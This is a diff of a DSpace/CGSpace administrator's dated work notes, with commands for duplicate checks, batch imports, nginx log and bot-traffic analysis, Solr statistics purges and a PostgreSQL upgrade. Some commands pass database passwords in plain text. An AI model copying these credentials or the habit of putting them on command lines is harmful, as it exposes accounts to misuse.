                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/tac.csv
                                                                                                                                                                                                                                                                                                                                                                                                                      +$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-02-07-tac-batch2-201-400.csv
                                                                                                                                                                                                                                                                                                                                                                                                                      +$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                      +$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv > /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                      • Then I sent this second batch of items to Gaia to look at

                                                                                                                                                                                                                                                                                                                                                                                                                      2022-02-08

                                                                                                                                                                                                                                                                                                                                                                                                                      • Create a SAF archive for the first 200 items (IDs 1 to 200) that were not flagged as duplicates and upload them to a new collection on DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                      $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-08-tac-batch1-1to200.map
                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-08-tac-batch1-1to200.map
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        • Fix some occurrences of “Hammond, Jim” to be “Hammond, James” on CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                        • Start a full index on AReS
                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -355,12 +355,12 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                        • I extract the logs from nginx for yesterday so I can analyze the traffic:
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-access.log
                                                                                                                                                                                                                                                                                                                                                                                                                        -# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-rest.log
                                                                                                                                                                                                                                                                                                                                                                                                                        -# awk '{print $1}' /tmp/feb9-* | less | sort -u > /tmp/feb9-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                        -# wc -l /tmp/feb9-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                        -11636 /tmp/feb9-ips.tx
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-access.log
                                                                                                                                                                                                                                                                                                                                                                                                                          +# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-rest.log
                                                                                                                                                                                                                                                                                                                                                                                                                          +# awk '{print $1}' /tmp/feb9-* | less | sort -u > /tmp/feb9-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                          +# wc -l /tmp/feb9-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                          +11636 /tmp/feb9-ips.tx
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          • I started resolving them with my resolve-addresses-geoip2.py script
                                                                                                                                                                                                                                                                                                                                                                                                                          • In the mean time I am looking at the requests and I see a new user agent: 1science Resolver 1.0.0
                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -374,52 +374,52 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                            • Looking at the top twenty or so ASNs for the resolved IPs I see lots of bot traffic, but nothing malicious:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
                                                                                                                                                                                                                                                                                                                                                                                                                            -     79 24940
                                                                                                                                                                                                                                                                                                                                                                                                                            -     89 36908
                                                                                                                                                                                                                                                                                                                                                                                                                            -    100 9299
                                                                                                                                                                                                                                                                                                                                                                                                                            -    107 2635
                                                                                                                                                                                                                                                                                                                                                                                                                            -    110 44546
                                                                                                                                                                                                                                                                                                                                                                                                                            -    111 16509
                                                                                                                                                                                                                                                                                                                                                                                                                            -    118 7552
                                                                                                                                                                                                                                                                                                                                                                                                                            -    120 4837
                                                                                                                                                                                                                                                                                                                                                                                                                            -    123 50245
                                                                                                                                                                                                                                                                                                                                                                                                                            -    123 55836
                                                                                                                                                                                                                                                                                                                                                                                                                            -    147 45899
                                                                                                                                                                                                                                                                                                                                                                                                                            -    173 33771
                                                                                                                                                                                                                                                                                                                                                                                                                            -    192 39832
                                                                                                                                                                                                                                                                                                                                                                                                                            -    202 32934
                                                                                                                                                                                                                                                                                                                                                                                                                            -    235 29465
                                                                                                                                                                                                                                                                                                                                                                                                                            -    260 15169
                                                                                                                                                                                                                                                                                                                                                                                                                            -    466 14618
                                                                                                                                                                                                                                                                                                                                                                                                                            -    607 24757
                                                                                                                                                                                                                                                                                                                                                                                                                            -    768 714
                                                                                                                                                                                                                                                                                                                                                                                                                            -   1214 8075
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
                                                                                                                                                                                                                                                                                                                                                                                                                              +     79 24940
                                                                                                                                                                                                                                                                                                                                                                                                                              +     89 36908
                                                                                                                                                                                                                                                                                                                                                                                                                              +    100 9299
                                                                                                                                                                                                                                                                                                                                                                                                                              +    107 2635
                                                                                                                                                                                                                                                                                                                                                                                                                              +    110 44546
                                                                                                                                                                                                                                                                                                                                                                                                                              +    111 16509
                                                                                                                                                                                                                                                                                                                                                                                                                              +    118 7552
                                                                                                                                                                                                                                                                                                                                                                                                                              +    120 4837
                                                                                                                                                                                                                                                                                                                                                                                                                              +    123 50245
                                                                                                                                                                                                                                                                                                                                                                                                                              +    123 55836
                                                                                                                                                                                                                                                                                                                                                                                                                              +    147 45899
                                                                                                                                                                                                                                                                                                                                                                                                                              +    173 33771
                                                                                                                                                                                                                                                                                                                                                                                                                              +    192 39832
                                                                                                                                                                                                                                                                                                                                                                                                                              +    202 32934
                                                                                                                                                                                                                                                                                                                                                                                                                              +    235 29465
                                                                                                                                                                                                                                                                                                                                                                                                                              +    260 15169
                                                                                                                                                                                                                                                                                                                                                                                                                              +    466 14618
                                                                                                                                                                                                                                                                                                                                                                                                                              +    607 24757
                                                                                                                                                                                                                                                                                                                                                                                                                              +    768 714
                                                                                                                                                                                                                                                                                                                                                                                                                              +   1214 8075
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              • The same information, but by org name:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
                                                                                                                                                                                                                                                                                                                                                                                                                              -     92 Orange
                                                                                                                                                                                                                                                                                                                                                                                                                              -    100 Hetzner Online GmbH
                                                                                                                                                                                                                                                                                                                                                                                                                              -    100 Philippine Long Distance Telephone Company
                                                                                                                                                                                                                                                                                                                                                                                                                              -    107 AUTOMATTIC
                                                                                                                                                                                                                                                                                                                                                                                                                              -    110 ALFA TELECOM s.r.o.
                                                                                                                                                                                                                                                                                                                                                                                                                              -    111 AMAZON-02
                                                                                                                                                                                                                                                                                                                                                                                                                              -    118 Viettel Group
                                                                                                                                                                                                                                                                                                                                                                                                                              -    120 CHINA UNICOM China169 Backbone
                                                                                                                                                                                                                                                                                                                                                                                                                              -    123 Reliance Jio Infocomm Limited
                                                                                                                                                                                                                                                                                                                                                                                                                              -    123 Serverel Inc.
                                                                                                                                                                                                                                                                                                                                                                                                                              -    147 VNPT Corp
                                                                                                                                                                                                                                                                                                                                                                                                                              -    173 SAFARICOM-LIMITED
                                                                                                                                                                                                                                                                                                                                                                                                                              -    192 Opera Software AS
                                                                                                                                                                                                                                                                                                                                                                                                                              -    202 FACEBOOK
                                                                                                                                                                                                                                                                                                                                                                                                                              -    235 MTN NIGERIA Communication limited
                                                                                                                                                                                                                                                                                                                                                                                                                              -    260 GOOGLE
                                                                                                                                                                                                                                                                                                                                                                                                                              -    466 AMAZON-AES
                                                                                                                                                                                                                                                                                                                                                                                                                              -    607 Ethiopian Telecommunication Corporation
                                                                                                                                                                                                                                                                                                                                                                                                                              -    768 APPLE-ENGINEERING
                                                                                                                                                                                                                                                                                                                                                                                                                              -   1214 MICROSOFT-CORP-MSN-AS-BLOCK
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
                                                                                                                                                                                                                                                                                                                                                                                                                                +     92 Orange
                                                                                                                                                                                                                                                                                                                                                                                                                                +    100 Hetzner Online GmbH
                                                                                                                                                                                                                                                                                                                                                                                                                                +    100 Philippine Long Distance Telephone Company
                                                                                                                                                                                                                                                                                                                                                                                                                                +    107 AUTOMATTIC
                                                                                                                                                                                                                                                                                                                                                                                                                                +    110 ALFA TELECOM s.r.o.
                                                                                                                                                                                                                                                                                                                                                                                                                                +    111 AMAZON-02
                                                                                                                                                                                                                                                                                                                                                                                                                                +    118 Viettel Group
                                                                                                                                                                                                                                                                                                                                                                                                                                +    120 CHINA UNICOM China169 Backbone
                                                                                                                                                                                                                                                                                                                                                                                                                                +    123 Reliance Jio Infocomm Limited
                                                                                                                                                                                                                                                                                                                                                                                                                                +    123 Serverel Inc.
                                                                                                                                                                                                                                                                                                                                                                                                                                +    147 VNPT Corp
                                                                                                                                                                                                                                                                                                                                                                                                                                +    173 SAFARICOM-LIMITED
                                                                                                                                                                                                                                                                                                                                                                                                                                +    192 Opera Software AS
                                                                                                                                                                                                                                                                                                                                                                                                                                +    202 FACEBOOK
                                                                                                                                                                                                                                                                                                                                                                                                                                +    235 MTN NIGERIA Communication limited
                                                                                                                                                                                                                                                                                                                                                                                                                                +    260 GOOGLE
                                                                                                                                                                                                                                                                                                                                                                                                                                +    466 AMAZON-AES
                                                                                                                                                                                                                                                                                                                                                                                                                                +    607 Ethiopian Telecommunication Corporation
                                                                                                                                                                                                                                                                                                                                                                                                                                +    768 APPLE-ENGINEERING
                                                                                                                                                                                                                                                                                                                                                                                                                                +   1214 MICROSOFT-CORP-MSN-AS-BLOCK
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                • Most of these are pretty normal except “Serverel” and Hetzner perhaps, but their user agents are pretending to be normal users so who knows…
                                                                                                                                                                                                                                                                                                                                                                                                                                • I decided to look in the Solr stats with facet.limit=1000&facet.mincount=1 and found a few more definitely non-human agents:
                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -439,25 +439,25 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                  • I added them to the ILRI override in the DSpace spider list and ran the check-spider-hits.sh script:
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 234 hits from randint in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 337 hits from Koha in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1164 hits from scalaj-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1528 hits from scpitspi-rs in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 3050 hits from lua-resty-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1683 hits from AHC in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1129 hits from acebookexternalhit in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 534 hits from Iframely in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1022 hits from qbhttp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 330 hits from ^got in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 156 hits from ^colly in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 38 hits from article-parser in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 1148 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 3126 hits from adreview in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Purging 217 hits from 1science in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  -Total number of bot hits purged: 14696
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 234 hits from randint in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 337 hits from Koha in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1164 hits from scalaj-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1528 hits from scpitspi-rs in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 3050 hits from lua-resty-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1683 hits from AHC in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1129 hits from acebookexternalhit in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 534 hits from Iframely in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1022 hits from qbhttp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 330 hits from ^got in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 156 hits from ^colly in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 38 hits from article-parser in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 1148 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 3126 hits from adreview in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Purging 217 hits from 1science in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    +Total number of bot hits purged: 14696
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    • I don’t have time right now to add any of these to the COUNTER-Robots list…
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Peter asked me to add a new item type on CGSpace: Opinion Piece
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Map an item on CGSpace for Maria since she couldn’t find it in the item mapper
                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -476,22 +476,22 @@ Purging 217 hits from 1science in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Install PostgreSQL 12 on my local dev environment to starting DSpace 6.x workflows with it:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:12-alpine
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ psql -h localhost -U postgres -c 'ALTER USER dspacetest SUPERUSER;'
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ psql -h localhost -U postgres -c 'ALTER USER dspacetest NOSUPERUSER;'
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:12-alpine
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ psql -h localhost -U postgres -c 'ALTER USER dspacetest SUPERUSER;'
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ psql -h localhost -U postgres -c 'ALTER USER dspacetest NOSUPERUSER;'
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Eventually I will updated DSpace Test, then CGSpace (time to start paying off some technical debt!)
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Start a full Discovery re-index on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        -real    292m49.263s
                                                                                                                                                                                                                                                                                                                                                                                                                                        -user    201m26.097s
                                                                                                                                                                                                                                                                                                                                                                                                                                        -sys     3m2.459s
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          +real    292m49.263s
                                                                                                                                                                                                                                                                                                                                                                                                                                          +user    201m26.097s
                                                                                                                                                                                                                                                                                                                                                                                                                                          +sys     3m2.459s
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Start a full harvest on AReS

                                                                                                                                                                                                                                                                                                                                                                                                                                          2022-02-14

                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -503,17 +503,17 @@ sys 3m2.459s
                                                                                                                                                                                                                                                                                                                                                                                                                                        or(
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('201')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('203')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('209')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('209')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('215')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('220')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('225')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('226')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('227')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('201')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('203')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('209')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('209')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('215')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('220')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('225')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('226')),
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('227')),
                                                                                                                                                                                                                                                                                                                                                                                                                                         ...
                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('396'))
                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('396'))
                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I flagged all matching records and exported a CSV to use with SAFBuilder
                                                                                                                                                                                                                                                                                                                                                                                                                                            @@ -521,15 +521,15 @@ isNotNull(value.match('396'))
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-14-tac-batch2-201to400.map
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-14-tac-batch2-201to400.map
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Export the next batch from OpenRefine (items with ID 401 to 700), check duplicates, and then join with the file names:
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-02-14-tac-batch3-401-700.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv > /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-02-14-tac-batch3-401-700.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv > /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            • I sent these 300 items to Gaia…

                                                                                                                                                                                                                                                                                                                                                                                                                                            2022-02-16

                                                                                                                                                                                                                                                                                                                                                                                                                                            @@ -541,36 +541,36 @@ $ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        # systemctl stop tomcat7
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_ctlcluster 10 main stop
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_ctlcluster 12 main stop
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_dropcluster 12 main
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_upgradecluster 10 main
                                                                                                                                                                                                                                                                                                                                                                                                                                        -# pg_ctlcluster 12 main start
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          # systemctl stop tomcat7
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_ctlcluster 10 main stop
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_ctlcluster 12 main stop
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_dropcluster 12 main
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_upgradecluster 10 main
                                                                                                                                                                                                                                                                                                                                                                                                                                          +# pg_ctlcluster 12 main start
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ su - postgres
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ cat /tmp/generate-reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                          -SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -FROM pg_class C
                                                                                                                                                                                                                                                                                                                                                                                                                                          -LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
                                                                                                                                                                                                                                                                                                                                                                                                                                          -WHERE nspname = 'public'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -  AND C.relkind = 'r'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -  AND nspname !~ '^pg_toast'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -ORDER BY pg_total_relation_size(C.oid) ASC;
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ <trim the extra stuff from /tmp/reindex.sql>
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ psql dspace < /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            $ su - postgres
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ cat /tmp/generate-reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                            +SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +FROM pg_class C
                                                                                                                                                                                                                                                                                                                                                                                                                                            +LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
                                                                                                                                                                                                                                                                                                                                                                                                                                            +WHERE nspname = 'public'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +  AND C.relkind = 'r'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +  AND nspname !~ '^pg_toast'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +ORDER BY pg_total_relation_size(C.oid) ASC;
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ <trim the extra stuff from /tmp/reindex.sql>
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ psql dspace < /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
